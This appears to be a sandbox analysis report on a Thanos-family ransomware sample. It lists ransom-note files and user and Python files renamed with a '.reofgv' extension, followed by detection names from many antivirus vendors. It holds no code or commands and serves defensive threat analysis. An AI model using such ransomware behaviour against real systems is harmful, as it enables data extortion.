file | C:\Python27\tcl\tcl8.5\encoding\gb12345.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp1254.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp1255.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-2.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macGreek.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp437.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp775.enc |
file | C:\Python27\tcl\tcl8.5\encoding\big5.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp936.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp869.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-5.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp949.enc |
file | C:\Python27\tcl\tcl8.5\encoding\ascii.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macRoman.enc |
file | C:\Python27\tcl\tcl8.5\encoding\gb1988.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-15.enc |
file | C:\Python27\tcl\tcl8.5\encoding\ebcdic.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macThai.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp865.enc |
file | C:\Python27\tcl\tcl8.5\encoding\shiftjis.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macCentEuro.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp850.enc |
file | C:\Python27\tcl\tcl8.5\encoding\jis0212.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp1251.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-9.enc |
file | C:\Python27\tcl\tcl8.5\encoding\euc-jp.enc |
file | C:\Python27\tcl\tcl8.5\encoding\euc-kr.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso2022-jp.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macTurkish.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-1.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp866.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macRomania.enc |
file | C:\Python27\tcl\tcl8.5\encoding\jis0201.enc |
file | C:\Python27\tcl\tcl8.5\encoding\macDingbats.enc |
file | C:\Python27\tcl\tcl8.5\encoding\iso8859-4.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp1250.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp862.enc |
file | C:\Python27\tcl\tcl8.5\encoding\cp864.enc |
file | C:\Python27\tcl\tcl8.5\encoding\koi8-r.enc |
file | C:\Python27\tcl\tcl8.5\encoding\koi8-u.enc |
file | C:\Users\test22\AppData\Local\Temp\RESTORE_FILES_INFO.txt |
file | C:\Users\test22\Desktop\RESTORE_FILES_INFO.txt |
file | C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.reofgv |
file | C:\Python27\Lib\test\cjkencodings\big5hkscs.txt.reofgv |
file | C:\Python27\click\click_image\attach.png.reofgv |
file | C:\Python27\tcl\tk8.5\images\logo64.gif.reofgv |
file | C:\Python27\tcl\tk8.5\msgs\da.msg.reofgv |
file | C:\Python27\Lib\email\test\data\msg_11.txt.reofgv |
file | C:\Python27\Lib\test\ssl_key.passwd.pem.reofgv |
file | C:\Python27\Lib\site-packages\PyScreeze-0.1.26-py2.7.egg-info\installed-files.txt.reofgv |
file | C:\Python27\Lib\site-packages\PyGetWindow-0.0.8-py2.7.egg-info\requires.txt.reofgv |
file | C:\Python27\tcl\tix8.4.3\pref\WmDefault.txt.reofgv |
file | C:\Python27\Lib\email\test\data\msg_30.txt.reofgv |
file | C:\Python27\Lib\test\cjkencodings\shift_jisx0213.txt.reofgv |
file | C:\Python27\Lib\email\test\data\msg_29.txt.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\fa.msg.reofgv |
file | C:\Python27\tcl\tix8.4.3\pref\SGIGray.cs.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\ga.msg.reofgv |
file | C:\Python27\Lib\email\test\data\msg_25.txt.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\nl.msg.reofgv |
file | C:\Python27\tcl\tix8.4.3\bitmaps\file.gif.reofgv |
file | C:\Python27\tcl\tix8.4.3\bitmaps\no_entry.gif.reofgv |
file | C:\Python27\Lib\test\cjkencodings\big5hkscs-utf8.txt.reofgv |
file | C:\Python27\tcl\tcl8.5\tzdata\Iceland.reofgv |
file | C:\Python27\tcl\tk8.5\images\logoLarge.gif.reofgv |
file | C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.reofgv |
file | C:\Python27\Tools\pynche\webcolors.txt.reofgv |
file | C:\Python27\tcl\tk8.5\images\pwrdLogo200.gif.reofgv |
file | C:\Python27\Lib\idlelib\NEWS.txt.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\de_be.msg.reofgv |
file | C:\Python27\Lib\site-packages\README.txt.reofgv |
file | C:\Python27\Lib\email\test\data\msg_28.txt.reofgv |
file | C:\Python27\Lib\test\audiodata\pluck-pcm32.wav.reofgv |
file | C:\Python27\Lib\test\cjkencodings\big5.txt.reofgv |
file | C:\Python27\Lib\test\nullbytecert.pem.reofgv |
file | C:\Users\test22\Documents\sByekmDWYN.docm.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\zh_cn.msg.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\es_sv.msg.reofgv |
file | C:\Python27\Lib\test\floating_points.txt.reofgv |
file | C:\Python27\Lib\test\test_doctest4.txt.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\ga_ie.msg.reofgv |
file | C:\Python27\Lib\test\audiodata\pluck-pcm16.wav.reofgv |
file | C:\Python27\tcl\tcl8.5\tzdata\Canada\Newfoundland.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\hi_in.msg.reofgv |
file | C:\Python27\Lib\email\test\data\msg_18.txt.reofgv |
file | C:\util\TCPView\Eula.txt.reofgv |
file | C:\Python27\Lib\test\cjkencodings\euc_jp-utf8.txt.reofgv |
file | C:\Python27\click\click\click_image\exec1.png.reofgv |
file | C:\Python27\Lib\email\test\data\msg_12a.txt.reofgv |
file | C:\Python27\Lib\test\ffdh3072.pem.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\es.msg.reofgv |
file | C:\Python27\tcl\tcl8.5\msgs\nb.msg.reofgv |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Gen:Heur.MSIL.Bladabindi.1 |
FireEye | Generic.mg.7bf8da9ae283c60e |
ALYac | Trojan.Ransom.Thanos |
Cylance | Unsafe |
Zillya | Trojan.Filecoder.Win32.18350 |
Sangfor | Trojan.Win32.Save.a |
K7AntiVirus | Trojan ( 005689411 ) |
Alibaba | Ransom:MSIL/Cryptolocker.7be74f43 |
K7GW | Trojan ( 005689411 ) |
CrowdStrike | win/malicious_confidence_100% (W) |
Arcabit | Trojan.MSIL.Bladabindi.1 |
BitDefenderTheta | Gen:NN.ZemsilF.34688.fm0@am7DGxg |
Cyren | W32/A-770b6427!Eldorado |
Symantec | ML.Attribute.HighConfidence |
ESET-NOD32 | a variant of MSIL/Filecoder.Thanos.A |
TrendMicro-HouseCall | Ransom.MSIL.THANOS.SM |
Avast | Win32:RansomX-gen [Ransom] |
Kaspersky | HEUR:Trojan-Ransom.MSIL.Crypren.gen |
BitDefender | Gen:Heur.MSIL.Bladabindi.1 |
Paloalto | generic.ml |
AegisLab | Trojan.MSIL.Crypren.j!c |
APEX | Malicious |
Rising | Ransom.Crypren!8.1D6C (CLOUD) |
Ad-Aware | Gen:Heur.MSIL.Bladabindi.1 |
Sophos | Mal/Generic-R + Mal/Hakbit-A |
F-Secure | Heuristic.HEUR/AGEN.1141108 |
DrWeb | Trojan.EncoderNET.31368 |
VIPRE | Trojan.Win32.Generic!BT |
TrendMicro | Ransom.MSIL.THANOS.SM |
McAfee-GW-Edition | BehavesLike.Win32.Generic.nh |
Emsisoft | Gen:Heur.MSIL.Bladabindi.1 (B) |
Ikarus | Trojan-Ransom.Thanos |
Webroot | W32.Trojan.Gen |
Avira | HEUR/AGEN.1142063 |
Gridinsoft | Ransom.Win32.AI.sa |
Microsoft | Ransom:MSIL/Cryptolocker.PDN!MTB |
ZoneAlarm | HEUR:Trojan-Ransom.MSIL.Crypren.gen |
GData | Gen:Heur.MSIL.Bladabindi.1 |
Cynet | Malicious (score: 100) |
AhnLab-V3 | Malware/Win32.RL_Generic.C4219461 |
McAfee | Ransom-Thanos!7BF8DA9AE283 |
MAX | malware (ai score=100) |
VBA32 | TScope.Trojan.MSIL |
Malwarebytes | Malware.AI.2022078683 |
Tencent | Msil.Trojan.Crypren.Ammq |
SentinelOne | Static AI - Malicious PE |
Fortinet | MSIL/Thanos.A!tr.ransom |
AVG | Win32:RansomX-gen [Ransom] |
Cybereason | malicious.ae283c |